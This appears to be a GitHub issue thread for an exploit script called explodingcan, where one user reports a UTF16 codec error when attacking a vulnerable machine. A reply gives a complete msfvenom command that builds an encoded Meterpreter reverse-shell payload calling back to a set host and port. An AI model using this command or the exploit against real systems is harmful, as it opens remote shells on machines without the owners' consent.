explodingcan icon indicating copy to clipboard operation
explodingcan copied to clipboard

UTF16 codec error

Open Gromak123 opened this issue 7 years ago • 1 comments

Hi,

Each time I try to use your script on a known vulnerable machine, I have this error :

[-] 'utf16' codec can't decode byte 0x41 in position 742: truncated data

I have built the shellcode using the command line you give in the README.md changing just the ip. Do you know how can I solve this ?

Best regards,

Gromak123 avatar Mar 23 '18 10:03 Gromak123

Hi Gromak123. I was having issues as well with the UTF16 check. I ended up having success using the following

msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/alpha_mixed LHOST=10.10.14.6 LPORT=4444 -o payload

ChrisMandich avatar May 13 '18 17:05 ChrisMandich